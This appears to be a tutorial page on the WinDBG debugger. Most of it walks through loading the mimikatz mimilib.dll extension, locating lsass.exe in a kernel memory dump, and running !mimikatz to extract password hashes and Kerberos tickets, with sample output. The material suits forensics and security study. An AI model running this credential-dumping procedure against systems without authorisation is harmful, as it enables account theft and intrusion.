Skip to content

WinDBG

WinDBG is a multipurpose debugger for the Microsoft Windows computer operating system, distributed by Microsoft. We can use WinDBG to debug kernel-mode and user-mode code, analyze crash dumps, and examine the CPU registers while the code executes. WinDBG is a powerful tool for debugging and analyzing Windows systems.

Installation

You can download the WinDBG installer from the official Microsoft website. The installer is available for both 32-bit and 64-bit systems.

Extracting Hashes via Mimikatz Plugin

We do need to load the Mimikatz plugin to extract hashes from the memory dump. mimikatz.dll is a plugin that can be used to extract passwords, hashes, PINs, and kerberos tickets from memory dumps. To extract hashes from the memory dump, follow these steps:

Download mimilib.dll from that GitHub repository Open WinDBG and load the memory dump file.

0: kd> .load c:\users\dax\downloads\mimikatz\x64\mimilib.dll
  .#####.   mimikatz 2.0 alpha (x64) built on Jan 17 2016 00:38:45
 .## ^ ##.  “A La Vie, A L’Amour” – Windows build 7601
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ‘## v ##’   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  ‘#####’                                  WinDBG extension ! * * */
===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================
0: kd> .SymFix
0: kd> .Reload
Loading Kernel Symbols
………………………………………………………
……………………………………………………….
……………………………………….
Loading User Symbols
…..
Loading unloaded module list
….Unable to enumerate user-mode unloaded modules, NTSTATUS 0xC0000147
Loading Wow64 Symbols
……………..
0: kd> !process 0 0 lsass.exe
PROCESS fffffa80072b2b10
    SessionId: 0  Cid: 01dc    Peb: 7fffffd6000  ParentCid: 0188
    DirBase: 137127000  ObjectTable: fffff8a001159230  HandleCount: 660.
    Image: lsass.exe
0: kd> .process /r /p fffffa80072b2b10
Implicit process is now fffffa80`072b2b10
Loading User Symbols
……………………………………………………….
0: kd> !mimikatz

The Mimikatz plugin will extract the hashes from the memory dump.